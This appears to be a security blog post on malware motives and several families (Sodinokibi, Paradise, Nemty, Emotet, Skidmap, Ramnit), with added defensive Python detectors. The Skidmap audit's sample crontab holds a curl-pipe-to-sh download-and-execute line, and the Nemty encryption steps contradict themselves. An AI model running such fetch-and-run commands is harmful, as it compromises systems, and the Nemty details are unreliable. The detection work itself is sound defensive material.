Why Do People Create Viruses And Malware?

Some people create viruses and malware because they enjoy causing trouble, and making others suffer. Some malware can crash an entire network system and cause system outages for large companies, like banks or production companies.


Why do People Create Computer Viruses?

  • To take control of a computer and use it for specific tasks

  • To generate money

  • To steal sensitive information (credit card numbers, passwords, personal details, data, etc.)

  • To prove a point, to prove it can be done, to prove one’s skill or for revenge purposes

  • To cripple a computer or network

To Take Control of a Computer and Use It for Specific Tasks

This is the most common type of virus, which is better classified as a trojan. These types of viruses are usually downloaded unknowingly by the computer user thinking that the file is something else, such as a file sent from an instant messenger friend or email attachment.

Once the host computer has been infected (it is then known as a zombie computer), the trojan joins a private chat channel and awaits orders from its “Zombie Master”. This Zombie Master, who is often the virus creator, will gather thousands of infected machines into what is called a botnet and use them to mount attacks on web servers. The Zombie Master can command each of these infected computers to send a tiny bit of information to a web server; because there are potentially thousands of computers doing this at once, it often overloads the server.

The Zombie Master may want to do this to another website because it is a rival website, a figurehead website (such as whitehouse.gov) or it may be part of an extortion plan. “Send me $5000 or your Toy selling website will be offline over the Christmas holidays”.

The Zombie Master can also use these infected computers to send spam while the zombie master remains anonymous and the blame goes to the infected computers.

To Generate Money

These types of infections often masquerade as free spyware or virus removal tools (known as rogueware). Once run, these fake applications will “scan” your computer and say it has some viruses (even if there aren’t any), and in order to remove them, you must pay for the full version of the application. A good example of such an infection is called Myzor.fk, which we have written about in the past.

To Steal Sensitive Information

These types of viruses can sniff the traffic going in or out of a computer for interesting information such as passwords or credit card numbers and send it back to the virus creator. They often use keylogging as a method of stealing information: the virus keeps a record of everything that is typed into the computer, such as emails, passwords, home banking data, instant messenger chats, etc.

The above-mentioned methods also allow an attacker to gather an incredible amount of data about a person that can be used for identity theft purposes.

To Prove a Point, To Prove it Can Be Done, To Prove One’s Skill or For Revenge Purposes

A perfect example of this type of virus was the famous MS Blaster virus (aka Lovesan), which infected hundreds of thousands of computers back in August 2003.

This virus would cause the system to restart after 60 seconds and had two hidden messages written in its code:

One was “I just want to say LOVE YOU SAN!!” which is why the virus is sometimes called Lovesan, and the other message was “billy gates why do you make this possible? Stop making money and fix your software!!”

It is believed that the purpose of this virus was to prove how easily exploitable a Windows system is.

To Cripple a Computer or Network

Few viruses nowadays are intended to disable a computer, because that stops the virus’s ability to spread to other computers. Computer-crippling viruses still exist, but they are nowhere near as common as the viruses mentioned above. The worst type of computer-crippling virus dates back to the days of the 486 computers, where the virus would overwrite the Master Boot Record (MBR) of the computer, which would often prevent the computer from starting up at all.

Unlike computer crippling viruses, network crippling viruses are all too common nowadays. Most viruses that are designed to launch a Denial of Service attack will cause a significant load on a computer network, often bringing it down completely.

Here’s how people are making money with computer viruses

Bank account theft

Virus creators are more than happy to help themselves to your bank details, sneaking in to grab your login details or credit card info. They can either transfer your funds away or use your credit card details to go on a shopping spree. Sometimes they’ll leave the fun to another person though, and simply sell your details to the highest bidder.

Ransomware

Rather than a financial snatch and grab, sometimes a virus will encrypt your files and demand money for the unlock code. Without a true backup plan in place beforehand, you’re at their mercy. You’ll be given very helpful information on how to pay, plus a firm deadline before your files are destroyed permanently. Even if you pay, there is never a guarantee that your files will be back. The best way to deal with ransomware is backups!

Ad swappers

A cheeky technique: they create a virus that either puts annoying ads on websites you visit or places affiliate codes on pages so that when you buy something legitimately (e.g. from Amazon) they get a percentage as a ‘referral fee’. Their kickback doesn’t make your purchase cost more, and you may not even know you’re supporting their activities. This is a very common issue with free software; sometimes it comes with more than you asked for!

Bitcoin mining

You might have heard of digital currencies being used for payment, but did you know you can also earn them with your computer processing power? Unfortunately, sometimes ‘renting’ out your computer’s processing power means paying more in running costs than you’d make – unless you were very clever and sneaky, and used a virus to rent out other people’s computers. Certain websites with illegal content (we won’t mention them here!) used to install a piece of malware that would use up to 100% of computer resources when the computer was idle. Many people never even noticed it.

Botnets

Certain infected computers can be remotely controlled to do whatever the virus creator wants. In this case, they’ll usually set the infected bot computers to overwhelm a target web server, like an e-commerce store. Sometimes it’s done as revenge, but more often it’s blackmail. The ‘Botmaster’ says “pay me thousands of dollars or I’ll crash your site during the biggest shopping day of the year.” For example, imagine if Amazon’s website goes down for several hours during Christmas shopping time!

Account stealing

Subscription accounts like Netflix and Hulu are often hijacked, leaving you to pay the bill for someone else’s entertainment. But sometimes, virus creators go one step further with online gaming accounts. All those digital items that you fought so hard for (special clothing, weapons etc.) can carry real-world value and be stolen from your account and sold on a black market. Yes, that’s cheating!

Why do People Create malware?

Malware is the software you don’t want. It exists because someone created it. Maybe they thought it was fun, and they created it just to prove they could. Maybe they created it to annoy someone. Or maybe they created it to make money, either directly, or by selling it to someone with a different motive.

When I say software you don’t want, I mean that although someone might want it, you don’t. That might include software designed to show you adverts while you are online, or software designed to spy on your computer activity, as part of industrial espionage or perhaps stalking.

Malware such as the recent cryptolocker ransomware is designed to make money directly – it hides the data on your computer, then demands money (in bitcoins) to allow you to recover it. Other malware might use your computer to send spam – advertising email that encourages people to buy a product or service, or it might take part in a denial-of-service attack against an individual or company. That might be for political reasons, or to embarrass them, or to hurt their business by preventing customers from using their website.


Sodinokibi Ransomware

Sodinokibi ransomware, also known as Sodin and REvil, is hardly three months old, yet it has quickly become a topic of discussion among cybersecurity professionals because of its apparent connection with the infamous-but-now-defunct GandCrab ransomware.

Detected by Malwarebytes as Ransom.Sodinokibi, Sodinokibi is a ransomware-as-a-service (RaaS), just as GandCrab was, though researchers believe it to be more advanced than its predecessor. We’ve watched this threat target businesses and consumers equally since the beginning of May, with a spike for businesses at the start of June and elevations in consumer detections in both mid-June and mid-July. Based on our telemetry, Sodinokibi has been on the rise since GandCrab’s exit at the end of May.


ANALYSIS OF THE ATTACK

The initial infection vector used by the threat actor is a phishing email containing a malicious link. When clicked, the link downloads a supposedly legitimate zip file that is actually malicious. Sodinokibi zip files have a very low detection rate on VirusTotal, which signals that the majority of antivirus vendors do not flag the initial payload as malicious. Since the initial Sodinokibi payload is able to pass undetected, the first layer of defense for many organizations is immediately bypassed. The zip file contains an obfuscated JavaScript file. When the user double-clicks on the JavaScript file, WScript executes it. The JavaScript file deobfuscates itself by rearranging characters from a list called eiculwo, which is located in the JavaScript file. The variable vhtsxspmssj, also located in the JavaScript file, is an obfuscated PowerShell script that is deobfuscated later on in the attack.
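The infection chain above hinges on a script file inside a zip attachment being handed to WScript when the user double-clicks it. The following mail-gateway style check is an added example, not code from the original post or from Malwarebytes: it opens an attachment in memory, lists every member whose extension Windows would execute directly (including double extensions such as “.pdf.js” and scripts tucked inside nested archives), and is meant to quarantine the message before the user ever sees the file. The sample archive and its member names are constructed for the demonstration.

```python
"""Inspect a zip attachment for script/executable members before delivery.
Added example (not part of the original post); the sample archive is constructed."""
import io
import zipfile

# Extensions that Windows Script Host (WScript/CScript) or the shell will run
# directly when a user double-clicks them.
SCRIPT_EXTENSIONS = {
    ".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
    ".ps1", ".cmd", ".bat", ".exe", ".scr",
}

MAX_DEPTH = 3  # stop recursing into nested archives past this depth


def suspicious_members(zip_bytes: bytes, depth: int = 0, prefix: str = "") -> list:
    """Return archive paths of members that would execute if the user opened them.

    Nested zip members are descended into (up to MAX_DEPTH) and reported as
    'outer.zip/inner_name'. An unreadable archive is itself reported, since a
    gateway should not pass through what it cannot inspect.
    """
    findings = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(zip_bytes))
    except zipfile.BadZipFile:
        return [prefix + "<not a valid zip archive>"]
    for info in archive.infolist():
        name = info.filename
        path = prefix + name
        lower = name.lower()
        # endswith() catches double extensions like "invoice.pdf.js" as well
        if any(lower.endswith(ext) for ext in SCRIPT_EXTENSIONS):
            findings.append(path)
        elif lower.endswith(".zip") and depth < MAX_DEPTH:
            findings.extend(suspicious_members(archive.read(info), depth + 1, path + "/"))
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample resembling the lure: a harmless text file next to a
    .js file with a misleading double extension, plus a nested zip carrying a .vbs."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("macro.vbs", "' placeholder content, not a real script\n")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("readme.txt", "plain text\n")
        z.writestr("invoice_2019.pdf.js", "// placeholder content, not a real script\n")
        z.writestr("archive.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for hit in suspicious_members(build_sample_zip()):
        print("quarantine:", hit)
```

Blocking by member extension is deliberately blunt: it does not try to judge whether the JavaScript is obfuscated, because the low VirusTotal detection rate mentioned above shows how unreliable content-based judgement is at this stage. Pairing the check with a group policy that opens .js/.vbs files in Notepad instead of WScript closes the same gap on the endpoint.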

Type and source of infection

Ransom.Sodinokibi is ransomware that encrypts all the files on local drives except for those that are listed in its configuration file.

Targeted files have the extensions .jpg, .jpeg, .raw, .tif, .png, .bmp, .3dm, .max, .accdb, .db, .mdb, .dwg, .dxf, .cpp, .cs, .h, .php, .asp, .rb, .java, .aaf, .aep, .aepx, .plb, .prel, .aet, .ppj, .gif, and .psd.

For more Cyber Security Information Contact us at help@theweborion.com

Paradise Ransomware

The Paradise Ransomware is an encryption ransomware Trojan first seen in the second week of September 2017. The Paradise Ransomware is part of a Ransomware as a Service (RaaS) platform that includes threats such as TeslaWare. These services allow criminals to rent a third party to create and manage ransomware Trojans, which they can customize and distribute depending on the targets they want to attack. The people responsible for the RaaS take a percentage of the profits while handling payment processing and maintaining the infrastructure.

The person renting the services of the RaaS can choose the way in which they will distribute the Paradise Ransomware. Some common methods of delivering these threats include corrupted spam email attachments and various compromised websites and content.

Following infiltration, Paradise encrypts stored files using RSA-1024 cryptography and appends the names of encrypted files with the “id-[affiliate_id].[affiliate_email].Paradise” extension. For example, “sample.jpg” might be renamed to a filename such as “sample.jpg-3VwVCmhU.[info@decrypt.ws].Paradise”. Following successful encryption, Paradise creates text files (“PARADISE_README_paradise@all-ransomware.info.txt”, “Files.txt”, “Failed.txt”, and “#DECRYPT MY FILES#.txt”), placing them on the desktop.

Paradise ransomware has never been among the riskiest digital threats. Nevertheless, the developers of the ransomware chose to return with another version. Security researchers reported that toward the beginning of March the new variant began appending the [id-].[support@all-ransomware.info].sell file extension. Later versions still use the same unbreakable encryption method, so only backups can help you fully recover after a Paradise infection. Following the encryption, it also delivers a ransom note called #DECRYPT MY FILES#.html. The criminals demand that the ransom be paid in Bitcoin.

When Paradise ransomware infects your PC, it will check all the drive letters for targeted file types, encrypt them, and then append an extension to them. Once these files are encrypted, they can no longer be opened by your normal programs. When the ransomware has finished with the victim’s files, it displays a pop-up ransom note that includes instructions on how to make a payment.

How to secure your PC against Paradise ransomware?

The main causes of PC infections are poor knowledge and careless behaviour. Therefore, be careful when browsing the Internet. Never open files received from suspicious emails or download software from unofficial sources. If possible, use the direct download URL rather than third-party downloaders, since these tools often bundle malicious or potentially unwanted applications. In addition, keep your software up to date and use a legitimate anti-virus/anti-spyware suite. The key to computer safety is caution.


Nemty Ransomware

Nemty ransomware is a crypto-malware, most variants of which turned out to be decryptable because of bugs in its AES-256 key scheduling and CBC block-mode implementation. Nemty drops a ransom note that tells the victim what to do to recover their encrypted files, and it deletes the shadow copies of the files it encrypts on a machine. According to Bleeping Computer’s own tests, Nemty demands a ransom of 0.09981 bitcoin, which amounts to around US$1,000 as of writing.

The purpose of this ransomware is to encrypt data stored on the device so that the developers can make ransom demands by offering paid recovery of the files. NEMTY PROJECT also appends each file name with the “.nemty” extension (e.g., “sample.jpg” becomes “sample.jpg.nemty”). In addition, NEMTY PROJECT stores a text file named “NEMTY-DECRYPT.txt” in most existing folders. An updated variant of the NEMTY PROJECT ransomware appends filenames with the “._NEMTY_[random_characters]_” extension (e.g., “1.jpg” -> “1.jpg._NEMTY_huWhN62_”) and creates another file, “_NEMTY_[random_characters]_-DECRYPT.txt” (e.g., “_NEMTY_huWhN62_-DECRYPT.txt”), containing an identical message.

The decryptor currently supports only a limited number of file extensions; however, Tesorion has told BleepingComputer that they are expanding support for more file types every day. The file types currently supported by the decryptor are:

avi, bmp, gif, mp3, jpeg, jpg, mov, mp4, qt, 3gp, mpeg, mpg, doc, docb, speck, ole, pot, pps, ppt, wbk, xlm, xls, xlsb, xlt, pdf, png, tif, tiff, nef, doc, txt, docm, docx, dotm, dotx, container, potm, potx, ppsm, ppsx, pptm, pptx, xlsm, xlsx, xltm, xltx, zip

Rather than shipping a decryptor that computes the key on the victim’s PC, Tesorion chose to keep the decryption key generation on their own servers.

Tesorion told BleepingComputer they went this route in order to prevent the ransomware developers from analyzing the decryptor and learning the weakness in their algorithm.

File Encryption

Nemty ransomware uses a combination of AES-128 in CBC mode, RSA-2048, and the unusual RSA-8192 for its file encryption and key protection. The following steps summarize its encryption process.

Generate a 32-byte value using a pseudo-random algorithm. This value is added to the configuration data later on. The first sixteen bytes are used as the main AES key for file encryption.

Decrypt and import the embedded RSA-8192 public key using the same RC4-base64 function.

Include the generated private key from step 2 in the configuration file, which also contains other data gathered from the device (discussed in the next section).

Encrypt the configuration file using the RSA-8192 public key imported in step 3 and encode it in base64.

Generate another 16-byte value using the same algorithm used in step 1. This is the IV (initialization vector) for the AES-128 CBC mode encryption. A new IV is generated for every file.

Encrypt the file contents using the main AES key from step 1 and the current IV.

Encrypt the current IV using RSA-2048 with the locally generated public key from step 2 and encode it in base64.

Append the encrypted IV to the file.

The best way to avoid harm from ransomware infections is to maintain regular, up-to-date backups.
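Both the Paradise and Nemty write-ups above name the artefacts these families leave on disk: renamed files with a distinctive appended extension and ransom notes with fixed names. The script below is an added example (not code from the original post, from Tesorion or from any vendor) that turns those indicators into a simple file-listing scan: it classifies each path as a ransom note or a renamed file for either family and raises an alert when a note is present or when the count of renamed files crosses a threshold. The directory listing it scans is constructed; the extension and note patterns come from the two sections above.

```python
"""Spot Paradise and Nemty file-name indicators in a directory listing.
Added example; the listing below is constructed, not a real victim's."""
import re
from collections import Counter

# Renamed-file patterns from the write-ups: Paradise appends
# ".[affiliate_email].Paradise" (".sell" in the later variant);
# Nemty appends ".nemty" or "._NEMTY_<random>_".
FILE_PATTERNS = {
    "Paradise": re.compile(r"\.\[[^\]]+@[^\]]+\]\.(paradise|sell)$", re.IGNORECASE),
    "Nemty": re.compile(r"(\.nemty|\._NEMTY_[A-Za-z0-9]+_)$", re.IGNORECASE),
}

# Ransom-note names mentioned in the write-ups.
NOTE_PATTERNS = {
    "Paradise": re.compile(r"^(PARADISE_README_.*\.txt|#DECRYPT MY FILES#\.(txt|html))$", re.IGNORECASE),
    "Nemty": re.compile(r"^(NEMTY-DECRYPT\.txt|_NEMTY_[A-Za-z0-9]+_-DECRYPT\.txt)$", re.IGNORECASE),
}

# Constructed listing: a few renamed files and notes next to untouched documents.
SAMPLE_LISTING = [
    r"C:\Users\alice\Pictures\sample.jpg-3VwVCmhU.[info@decrypt.ws].Paradise",
    r"C:\Users\alice\Desktop\#DECRYPT MY FILES#.txt",
    r"C:\Users\alice\Documents\budget.xlsx.nemty",
    r"C:\Users\alice\Documents\1.jpg._NEMTY_huWhN62_",
    r"C:\Users\alice\Documents\_NEMTY_huWhN62_-DECRYPT.txt",
    r"C:\Users\alice\Documents\report.docx",
    r"C:\Users\alice\Documents\notes.txt",
]


def classify(path):
    """Return (family, kind) with kind 'note' or 'encrypted', or None if clean."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    for family, pattern in NOTE_PATTERNS.items():
        if pattern.search(name):
            return family, "note"
    for family, pattern in FILE_PATTERNS.items():
        if pattern.search(name):
            return family, "encrypted"
    return None


def scan(paths, threshold=5):
    """Summarise hits per family. A single ransom note is enough to alert,
    because notes are only dropped after encryption has already run; otherwise
    alert once the number of renamed files reaches the threshold."""
    counts = {family: Counter() for family in FILE_PATTERNS}
    for path in paths:
        hit = classify(path)
        if hit:
            family, kind = hit
            counts[family][kind] += 1
    return {
        family: {
            "encrypted": c["encrypted"],
            "notes": c["note"],
            "alert": c["note"] > 0 or c["encrypted"] >= threshold,
        }
        for family, c in counts.items()
    }


if __name__ == "__main__":
    for family, summary in scan(SAMPLE_LISTING).items():
        print(family, summary)
```

A scan like this is a detection of last resort, run from a file-server or backup job to catch an infection already in progress; it does nothing to recover the files, which is why the backup advice above stands.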


Emotet Trojan

Emotet is a sophisticated, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Emotet continues to be among the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors.

Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Additionally, Emotet is a polymorphic banking Trojan that can evade typical signature-based detection. It has several techniques for maintaining persistence, including auto-start registry keys and services. It uses modular Dynamic Link Libraries (DLLs) to continuously evolve and update its capabilities. Furthermore, Emotet is virtual-machine-aware and may generate false indicators if run in a virtual environment.

The U.S. Department of Homeland Security published an alert on Emotet in July 2018, describing it as “an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans,” and warning that it is very difficult to combat, capable of evading typical signature-based detection, and determined to spread itself. The alert explains that “Emotet infections have cost SLTT (state, local, tribal, and territorial) governments up to $1 million per incident to rectify.”

Emotet infections normally start with a simple phishing email that contains an attachment or a link to download a file. The recipient is persuaded to click the link or open the file, and they unwittingly set in motion a macro that downloads a malicious payload. As soon as the device is infected, Emotet starts trying to spread to other devices on the network. Once Trojan.Emotet has infected a networked machine, it propagates by enumerating network resources and writing to shared drives, as well as by brute-forcing user accounts. Infected machines try to spread Emotet laterally through brute-forcing of domain credentials, as well as externally through its built-in spam module. As a result, the Emotet botnet is quite active and responsible for much of the malspam we encounter. The Trojan may additionally download the following modules to perform various tasks:

  • Banking module

  • Distributed denial of service (DDoS) module

  • Spam module

  • Email client data stealer module

  • Browser info stealer module

  • Personal Storage Table (PST) data stealer module
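The lateral movement described above, brute-forcing domain credentials from an already-infected machine, leaves a recognisable trace in authentication logs: a burst of failed logons from one source host, often across many account names, sometimes followed by a success. The detection below is an added example, not code from the original post or from DHS, that runs a sliding window over such a log and reports the sources that cross a failure threshold, the account names tried, and whether a success followed while the burst was still in the window. The log lines are constructed in a simplified “timestamp user source result” format, not real Windows Security event records; in production the same logic would be fed from event ID 4625/4624 exports or a domain controller’s authentication log.

```python
"""Flag failed-logon bursts consistent with credential brute-forcing.
Added example, not part of the original post. The log format is a constructed
simplification ("timestamp user source result"), not real Windows event data."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: one host tries six accounts in ten seconds and then
# succeeds on the sixth; another host shows a single ordinary typo.
SAMPLE_LOG = """\
2019-09-16T10:00:01 alice 10.0.0.5 FAILURE
2019-09-16T10:00:03 bob 10.0.0.5 FAILURE
2019-09-16T10:00:05 carol 10.0.0.5 FAILURE
2019-09-16T10:00:06 dave 10.0.0.5 FAILURE
2019-09-16T10:00:08 erin 10.0.0.5 FAILURE
2019-09-16T10:00:09 frank 10.0.0.5 FAILURE
2019-09-16T10:00:12 frank 10.0.0.5 SUCCESS
2019-09-16T10:02:00 grace 10.0.0.9 FAILURE
2019-09-16T10:02:30 grace 10.0.0.9 SUCCESS
2019-09-16T11:00:00 alice 10.0.0.5 FAILURE
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (FAILURE|SUCCESS)$")


def parse_line(line):
    """Parse one constructed log line into (timestamp, user, source, result)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S")
    return ts, m.group(2), m.group(3), m.group(4)


def find_bruteforce(log_text, window=timedelta(seconds=60), threshold=5):
    """Return {source: {peak_failures, users, success_after_burst}} for every
    source that accumulates `threshold` failures inside any `window`."""
    recent = defaultdict(deque)  # source -> (timestamp, user) of failures still in window
    findings = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, user, source, result = parsed
        q = recent[source]
        # Drop failures that have aged out of the sliding window
        while q and ts - q[0][0] > window:
            q.popleft()
        if result == "FAILURE":
            q.append((ts, user))
            if len(q) >= threshold:
                entry = findings.setdefault(
                    source, {"peak_failures": 0, "users": set(), "success_after_burst": False})
                entry["peak_failures"] = max(entry["peak_failures"], len(q))
                entry["users"].update(u for _, u in q)
        elif source in findings and q:
            # A success while the burst is still inside the window: an account
            # was most likely guessed, so this source deserves isolation first.
            findings[source]["success_after_burst"] = True
    return {s: {**e, "users": sorted(e["users"])} for s, e in findings.items()}


if __name__ == "__main__":
    for source, detail in find_bruteforce(SAMPLE_LOG).items():
        print(source, detail)
```

The window and threshold are the tuning knobs: a 60-second window with five failures catches the fast guessing a worm does, while a legitimate user mistyping a password two or three times never reaches the threshold, as the second host in the sample shows.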

Impact

Negative effects of an Emotet infection include:

  • temporary or permanent loss of sensitive or proprietary data,

  • disruption to normal operations,

  • financial losses incurred to restore systems and files, and

  • potential harm to an organization’s reputation.

Prevention techniques

Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.

Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.

Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, make sure that the program asking for administration-level access is a legitimate application.

Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.

Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.

Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have fewer avenues of attack.


Skidmap Malware Attack

Skidmap, a Linux malware, demonstrates the increasing complexity of recent cryptocurrency-mining threats. This malware is notable because of the way it loads malicious kernel modules to keep its cryptocurrency mining operations under the radar.

Skidmap then installs multiple malicious binaries, the first minimizing the infected machine’s security settings so that it can begin mining cryptocurrency unhindered. TrendMicro warns that Skidmap “demonstrates the increasing complexity of recent cryptocurrency-mining threats”, pointing out that it is “notable because of the way it loads malicious kernel modules to keep its cryptocurrency mining operations under the radar”.

The infection chain sees the Skidmap miner installing itself via crontab; the malicious cron entry then downloads and executes the main binary. The malware lowers the security settings of the target system by switching the Security-Enhanced Linux (SELinux) module to permissive mode or by disabling the SELinux policy and setting selected processes to run in confined domains. The miner also sets up backdoor access to the infected system.

Skidmap also provides attackers with backdoor access to the infected machine.

“Skidmap also sets up a way to gain backdoor access to the machine. It does this by having the binary add the public key of its handlers to the authorized_keys file, which contains keys needed for authentication.” continues the report.

In particular, one rootkit will fake network traffic and CPU-related statistics to make it appear that the machine is clean. This will include the creation of sham traffic involving particular ports, IP addresses, CPU loads and processes. A CPU with a heavy load is a well-known indicator of cryptocurrency mining as the power used to work out the mathematical puzzles required to secure digital coins is generally high. In Skidmap’s case, traffic information is faked to make CPU usage always appear low.

In addition, the malware is equipped with modules able to monitor cryptocurrency mining processes, hide specific files, and set up malicious cron jobs for executing other malicious files. The use of rootkits is an interesting development in the world of Linux-based cryptocurrency mining. Another recently-discovered Trojan sample, called InnfiRAT, was found to contain functionality specifically designed for the theft of cryptocurrency-related wallet credentials on infected machines.
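Three of the Skidmap behaviours described above are cheap to audit from the outside: a cron entry that downloads and executes code, SELinux switched away from enforcing, and an extra public key in authorized_keys. The audit below is an added example, not code from the original post or from Trend Micro; it checks constructed copies of those three files against an allow-list of known administrator keys and reports each deviation. The key blobs, crontab line and hostname in it are placeholders, and the allow-list is an assumption that an organisation maintains such a list of its own keys.

```python
"""Audit the persistence and backdoor footholds the Skidmap write-up describes.
Added example; all inputs below are constructed stand-ins for
~/.ssh/authorized_keys, /etc/selinux/config and the root crontab."""
import re

# Assumed allow-list of "type blob" strings for keys an admin actually issued.
ALLOWED_KEYS = {
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKEYFORADMIN",
}

# Constructed sample inputs (placeholder key material and placeholder URL).
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKEYFORADMIN admin@workstation
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQEXAMPLEUNKNOWNKEY
"""
SAMPLE_SELINUX_CONFIG = "SELINUX=permissive\nSELINUXTYPE=targeted\n"
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/1 * * * * curl -fsSL http://placeholder.invalid/pm.sh | sh
"""

SELINUX_MODE_RE = re.compile(r"^\s*SELINUX\s*=\s*(\w+)", re.MULTILINE)
DOWNLOAD_RE = re.compile(r"\b(curl|wget)\b")
EXEC_RE = re.compile(r"\|\s*(sh|bash)\b|\bchmod\s+\+x\b|/tmp/|/dev/shm/")


def audit_authorized_keys(text, allowed=ALLOWED_KEYS):
    """Report keys not on the allow-list. Assumes plain 'type blob [comment]'
    lines; lines carrying leading options are not parsed here."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        if len(parts) < 2:
            continue
        key = f"{parts[0]} {parts[1]}"
        if key not in allowed:
            comment = parts[2] if len(parts) > 2 else "(no comment)"
            findings.append(f"authorized_keys line {n}: key not in allow-list {comment}")
    return findings


def audit_selinux(config_text):
    """Report anything other than enforcing mode, the state Skidmap removes."""
    m = SELINUX_MODE_RE.search(config_text)
    mode = m.group(1).lower() if m else "unknown"
    if mode != "enforcing":
        return [f"SELinux mode is '{mode}', expected 'enforcing'"]
    return []


def audit_crontab(text):
    """Report cron commands that fetch something and run it in one line."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if DOWNLOAD_RE.search(line) and EXEC_RE.search(line):
            findings.append(f"crontab line {n}: download-and-execute pattern: {line.strip()}")
    return findings


def run_audit(keys=SAMPLE_AUTHORIZED_KEYS, selinux=SAMPLE_SELINUX_CONFIG, cron=SAMPLE_CRONTAB):
    """Combine the three checks into one list of findings."""
    return audit_authorized_keys(keys) + audit_selinux(selinux) + audit_crontab(cron)


if __name__ == "__main__":
    for finding in run_audit():
        print(finding)
```

Because the write-up notes that Skidmap’s rootkit falsifies CPU and network statistics on the host itself, checks like these are most trustworthy when run against files pulled off the machine (or from a read-only forensic mount) rather than from a shell on the suspect host.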

Ramnit Malware

Ramnit is a family of malware-distribution trojans. Depending on the version, anti-virus suites may detect Ramnit as “Win32/Ramnit.A” or “Win32/Ramnit.B”. These viruses infiltrate systems without the user’s consent and open “backdoors” for other malware to infiltrate the machine. Therefore, its presence generally leads to further computer infections.

Ramnit is typically spread via flash drives, and it all begins after the worm (Win32/Ramnit) is copied with a random file name. The infection is rampant on websites that promise to provide keygens and cracks. If not handled in time, Ramnit infects more files and the entire machine may eventually become unusable.

The first Ramnit variant, which emerged in 2010, was a virus that infected EXE, DLL and HTML files found on the computer. Later versions included the ability to steal confidential information from the infected machine. Ramnit was initially designed to attack bank accounts by infecting PCs and using them as proxy servers for malicious activity.

Depending on the variant, Ramnit-infected machines can also be enslaved in a botnet. Over time, the original Ramnit malware has been modified so that newer versions include the ability to serve as a backdoor and to communicate with a command and control (C&C) server, allowing an attacker to control a botnet of Ramnit-infected machines. The combined resources of the Ramnit botnet allowed it to be used by its controller(s) to carry out various malicious actions, notably stealing personal and banking information.

Ramnit is used to distribute a number of viruses. These viruses have different developers and their behaviour may differ accordingly (some encrypt data, others steal data, cause further chain infections, etc.); however, all pose a direct threat to your privacy and computer/data safety. Therefore, removing all viruses from the system is paramount.

How to remove Ramnit from your computer?

This tool from Symantec is specifically designed to detect and remove Ramnit from computers. To use this tool, one needs to be logged in as an administrator and only then download the executable file FxRamnit.exe. The tool will automatically repair all the infected files and also reset the registry values that were tampered with. Moreover, the tool will terminate all the processes associated with Ramnit.
